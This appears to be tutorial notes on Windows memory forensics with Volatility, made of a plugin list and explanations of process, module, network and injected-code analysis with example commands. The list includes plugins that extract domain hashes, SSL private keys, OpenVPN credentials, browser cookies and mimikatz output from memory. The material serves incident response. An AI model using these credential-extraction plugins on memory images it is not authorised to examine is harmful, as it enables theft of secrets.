bioskbd Reads the keyboard buffer from Real Mode memory
cachedump Dumps cached domain hashes from memory
chromecookies Scans for and parses potential Chrome cookie data
chromedownloadchains Scans for and parses potential Chrome download chain records
chromedownloads Scans for and parses potential Chrome download records
chromehistory Scans for and parses potential Chrome url history
chromevisits Scans for and parses potential Chrome url visits data
clipboard Extract the contents of the windows clipboard
cmdline Display process command-line arguments
cmdscan Extract command history by scanning for _COMMAND_HISTORY
connections Print list of open connections (Windows XP and 2003 only)
connscan Pool scanner for tcp connections
consoles Extract command history by scanning for
_CONSOLE_INFORMATION
crashinfo Dump crash-dump information
deskscan Pool scanner for tagDESKTOP (desktops)
devicetree Show device tree
directoryenumerator Enumerates all unique directories from FileScan
dumpcerts Dump RSA private and public SSL keys
dumpfiles Extract memory mapped and cached files
dumpregistry Dumps registry files out to disk
eventhooks Print details on windows event hooks
evtlogs Extract Windows Event Logs (XP/2003 only)
filescan Pool scanner for file objects
firefoxcookies Scans for and parses potential Firefox cookies (cookies.sqlite moz_cookies table)
firefoxhistory Scans for and parses potential Firefox url history (places.sqlite
moz_places table)
iehistory Reconstruct Internet Explorer cache / history
imagecopy Copies a physical address space out as a raw DD image
imageinfo Identify information for the image
kdbgscan Search for and dump potential KDBG values
machoinfo Dump Mach-O file format information
malfind Find hidden and injected code
malfinddeep Find hidden and injected code, whitelist with ssdeep hashes


malprocfind Finds malicious processes based on discrepancies from observed, normal behavior and properties
malsysproc Find malware hiding in plain sight as system processes
mbrparser Scans for and parses potential Master Boot Records (MBRs)
memdump Dump the addressable memory for a process
memmap Print the memory map

mimikatz mimikatz offline


moddump Dump a kernel driver to an executable file sample
modscan Pool scanner for kernel modules
netscan Lists existing and established connections
notepad List currently displayed notepad text
openioc_scan Scan OpenIOC 1.1 based indicators
openvpn Extract OpenVPN client credentials (username, password) cached
in memory.
privs Display process privileges
procdump Dump a process to an executable file sample
processbl Scans memory for processes and loaded DLLs and compares the
results with the baseline
pslist Print all running processes by following the EPROCESS lists
psscan Pool scanner for process objects
pstotal Combination of pslist,psscan & pstree --output=dot gives graphical
representation
pstree Print process list as a tree
psxview Find hidden processes with various process listings
raw2dmp Converts a physical memory sample to a windbg crash dump
sessions List details on _MM_SESSION_SPACE (user logon sessions)
sockets Print list of open sockets
sockscan Pool scanner for tcp socket objects
ssdeepscan Scan process or kernel memory with SSDeep signatures
vboxinfo Dump virtualbox information
vmwareinfo Dump VMware VMSS/VMSN information
volshell Shell in the memory image
windows Print Desktop Windows (verbose details)
wndscan Pool scanner for window stations
yarascan Scan process or kernel memory with Yara signatures


Plugin Description
pslist Displays the running processes found in the memory image by walking the kernel's linked list of _EPROCESS structures. This is useful for spotting malware in a memory dump.
pslist also lists exited processes (2 in the snippet below), which stay in the list until their objects are torn down.

psscan Provides a more in-depth view than pslist: it scans physical memory for _EPROCESS pool allocations instead of following the linked list.

This plugin can therefore find processes that pslist cannot: terminated processes and processes a rootkit has unlinked from the list.

pstree Shows the processes as a hierarchy (parent/child relationships), which makes unexpected parents, such as a command shell spawned by a service, easy to see.


cmdscan / consoles Useful for gathering the commands an attacker typed at the Windows command line; both work by scanning the memory of csrss.exe (XP/2003) or conhost.exe (Windows 7 and later) for the console history structures.

consoles not only collects the commands but also the output that the commands executed by the attacker produced.

2.2.3 Process and Memory Dumping – PROCDUMP / MEMDUMP

We can dump the executable image of a suspicious process with the procdump plugin: volatility -f filename --profile=profile-name procdump -p PID --dump-dir=directory-path
We dumped the SVC process using the above command into the current directory. This produces a Windows executable (the file command confirms the type).

In the same way, whenever a process seems malicious we can dump it out of the memory image, hash it and submit the hash for further analysis. Note that the dump is reconstructed from memory (relocations applied, some pages never paged in), so its hash normally differs from that of the original file on disk; an exact-hash lookup that finds nothing is therefore not evidence that the file is clean.


Another very useful plugin is memdump: instead of dumping the executable, we dump the memory associated with the process (all of its addressable pages, which is where injected code, decrypted configuration and strings live). The command is volatility -f filename --profile=profile-name memdump -p PID --dump-dir=directory-path

2.2.4 Kernel Module Scanner – MODSCAN

This scan shows kernel modules (drivers), including ones that have been unloaded or that a rootkit has hidden by unlinking them from the loaded-module list, because it scans physical memory for module pool allocations rather than walking that list.
It is also the way to spot a driver that has no corresponding file on disk, in other words one that exists only in memory.
We run it with the command volatility -f filename --profile=profile-name modscan


2.2.5 Network Connections Scanning

Different plugins are available for different Windows versions.

Operating System Available Plugins

Windows XP connections, connscan, sockets, sockscan
Windows Server 2003 connections, connscan, sockets, sockscan
Later versions (Vista and newer) netscan

The Python library ip2geotools can geolocate the non-RFC 1918 (public) IP addresses found here; private addresses (10/8, 172.16/12, 192.168/16) cannot be geolocated and have to be resolved from the internal network inventory instead.
Using netscan we can see which process communicates with which external address, and we can then take a process dump and a memory dump of that particular process for further analysis.

Introduction to Windows Memory Analysis

2.3.1 Volatility plugins (pstree, pslist and psscan)
2.3.2 malfind
This plugin finds hidden or injected code/DLLs in the memory image by looking for private memory regions that are both writable and executable and have no backing file on disk.

2.3.3 hollowfind
This plugin is designed to detect the various process hollowing techniques, in which a legitimately started process has its original image replaced in memory with malicious code.

Process injection vs. process hollowing

2.3.4 procdump
Dump the malicious processes and hash them. Submit the hashes to VirusTotal.
